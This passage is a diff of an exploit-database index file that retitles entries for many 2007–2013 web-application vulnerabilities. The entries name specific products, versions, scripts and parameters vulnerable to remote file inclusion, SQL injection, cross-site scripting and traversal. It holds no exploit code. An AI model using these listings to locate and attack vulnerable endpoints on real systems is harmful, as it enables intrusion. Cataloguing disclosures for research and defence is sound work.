Gallery 1.4.10 - Multiple Local/Remote File Inclusion",2007-02-05,anonymous,php,webapps,0 +29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusions",2007-02-05,anonymous,php,webapps,0 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Cross-Site Request Forgery (Change Admin Password)",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"cPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary '.RAR' File Upload",2007-02-09,"hamed bazargani",php,webapps,0 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 -29578,platforms/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagviewer.php Multiple Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29579,platforms/php/webapps/29579.txt,"Tagit! Tagit2b 2.1.B Build 2 - tag_process.php Multiple Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29580,platforms/php/webapps/29580.txt,"Tagit! Tagit2b 2.1.B Build 2 - CONFIG/errmsg.inc.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29581,platforms/php/webapps/29581.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/addTagmin.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29582,platforms/php/webapps/29582.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/ban_watch.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29583,platforms/php/webapps/29583.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/delTagmin.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29584,platforms/php/webapps/29584.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/delTag.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29585,platforms/php/webapps/29585.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/editTagmin.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29586,platforms/php/webapps/29586.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/editTag.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29587,platforms/php/webapps/29587.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/manageTagmins.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29588,platforms/php/webapps/29588.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/verify.php configpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29589,platforms/php/webapps/29589.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/index.php adminpath Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29590,platforms/php/webapps/29590.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/readconf.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/updateconf.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/updatefilter.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/wordfilter.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29578,platforms/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagviewer.php' Multiple Remote File Inclusions",2007-02-12,K-159,php,webapps,0 +29579,platforms/php/webapps/29579.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tag_process.php' Multiple Remote File Inclusions",2007-02-12,K-159,php,webapps,0 +29580,platforms/php/webapps/29580.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'CONFIG/errmsg.inc.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29581,platforms/php/webapps/29581.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/addTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29582,platforms/php/webapps/29582.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/ban_watch.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29583,platforms/php/webapps/29583.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/delTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29584,platforms/php/webapps/29584.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/delTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29585,platforms/php/webapps/29585.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/editTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29586,platforms/php/webapps/29586.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/editTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29587,platforms/php/webapps/29587.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/manageTagmins.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29588,platforms/php/webapps/29588.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/verify.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29589,platforms/php/webapps/29589.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/index.php?adminpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29590,platforms/php/webapps/29590.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/readconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/updateconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/updatefilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/wordfilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server - SearchResults.aspx Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 -29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 -29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 -29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 +29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 +29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 +29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ - Arcade.php SQL Injection",2007-02-15,sp00k,php,webapps,0 29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 - faq.php Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps,0 29606,platforms/php/webapps/29606.txt,"Calendar Express - search.php Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0 @@ -31398,44 +31399,44 @@ id,file,description,date,author,platform,type,port 29623,platforms/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",cgi,webapps,0 29624,platforms/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,php,webapps,0 29625,platforms/php/webapps/29625.txt,"phpTrafficA 1.4.1 - 'plotStat.php' File Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 -29626,platforms/php/webapps/29626.txt,"phpTrafficA 1.4.1 - banref.php lang Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 -29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 - preview.php PHP_script_path Parameter Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0 -29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 - news.php link_Parameters Parameter Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 -29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 - n_layouts.php link_Parameters Parameter Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 +29626,platforms/php/webapps/29626.txt,"phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 +29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 - 'preview.php?PHP_script_path' Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0 +29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 - 'news.php?link_Parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 +29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 - 'n_layouts.php?link_Parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Persistent Cross-Site Scripting",2013-11-16,"Ali Raza",ios,webapps,0 -29634,platforms/php/webapps/29634.txt,"Plantilla - list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 +29634,platforms/php/webapps/29634.txt,"Plantilla - 'list_main_pages.php?nfolder' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 - edit.php Directory Traversal",2007-02-22,"laurent gaffie",php,webapps,0 -29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 - 'step' Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0 -29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 -29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 -29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 +29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 - 'step' Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0 +29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 +29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 +29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - 'StyleCSS.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0 -29642,platforms/php/webapps/29642.txt,"Simple one-file Gallery - gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 -29643,platforms/php/webapps/29643.txt,"Simple one-file Gallery - gallery.php f Parameter Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0 +29642,platforms/php/webapps/29642.txt,"Simple one-file Gallery - 'gallery.php?f' Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 +29643,platforms/php/webapps/29643.txt,"Simple one-file Gallery - 'gallery.php?f' Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0 29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - 'download.php' Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - 'showcode.php' Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 -29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - data/flatevents.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 - data/js.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 - data/m_2.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29649,platforms/php/webapps/29649.txt,"Active Calendar 1.2 - data/m_3.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29650,platforms/php/webapps/29650.txt,"Active Calendar 1.2 - data/m_4.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29651,platforms/php/webapps/29651.txt,"Active Calendar 1.2 - data/y_2.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 - data/y_3.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 - data/mysqlevents.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - 'data/flatevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 - 'data/js.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 - 'data/m_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29649,platforms/php/webapps/29649.txt,"Active Calendar 1.2 - 'data/m_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29650,platforms/php/webapps/29650.txt,"Active Calendar 1.2 - 'data/m_4.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29651,platforms/php/webapps/29651.txt,"Active Calendar 1.2 - 'data/y_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 - 'data/y_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 - 'data/mysqlevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Persistent Cross-Site Scripting",2013-11-23,sajith,php,webapps,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php' searchkey Parameter Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 -29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x - modules/htmlframechat/index.php Multiple Parameter Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 +29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x - 'modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-24,r00t,php,webapps,0 29663,platforms/php/webapps/29663.txt,"SolarPay - 'index.php' Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 29667,platforms/php/webapps/29667.txt,"WordPress Theme Euclid 1.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 29668,platforms/php/webapps/29668.txt,"WordPress Theme Dimension - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"WordPress Theme Amplus - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 29670,platforms/php/webapps/29670.txt,"WordPress Theme Make A Statement (MaS) - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -30367,platforms/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30367,platforms/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - 'admin/membersearch.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 30190,platforms/php/webapps/30190.txt,"Joomla! Component Letterman Subscriber Module 1.2.4 - Mod_Lettermansubscribe.php Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 @@ -31446,25 +31447,25 @@ id,file,description,date,author,platform,type,port 29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 29694,platforms/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,php,webapps,0 29696,platforms/php/webapps/29696.txt,"aWebNews 1.1 - 'listing.php' path_to_news Parameter Remote File Inclusion",2007-03-01,mostafa_ragab,php,webapps,0 -29697,platforms/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 +29697,platforms/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,php,webapps,0 29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php' nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php iz' Parameter Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php s' Parameter SQL Injection",2007-02-26,CorryL,php,webapps,0 +29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php?iz' Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 -29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 +29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 -30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - 'admin/edituser.php?userid' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 +30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' SQL Injection",2007-07-23,Lostmon,php,webapps,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 -29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - includes/logger_engine.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - 'includes/functions_kb.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - 'includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - 'includes/logger_engine.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - 'engine/init.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - 'engine/Ajax/editnews.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 @@ -31487,64 +31488,64 @@ id,file,description,date,author,platform,type,port 29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion / Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 -29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - profile.php showuser Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 -29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - search.php search_user Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 +29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - 'profile.php?showuser' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 +29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - 'search.php?search_user' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 - 'change_password.php' userid Parameter Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 -29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 - contact.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 +29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 - 'login.php' AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 -29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 - register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 -29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0 +29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 +29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusions",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 29782,platforms/php/webapps/29782.txt,"Satel Lite - 'Satellite.php' Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 -29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php d' Parameter Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 +29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 30105,platforms/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 -30157,platforms/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - dwpage.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 -30158,platforms/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - wantedpages.php MosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30157,platforms/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - 'dwpage.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 +30158,platforms/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - 'wantedpages.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - search.php Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps,0 30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x - 'index.php' Multiple SQL Injections",2007-05-31,ls@calima.serapis.net,php,webapps,0 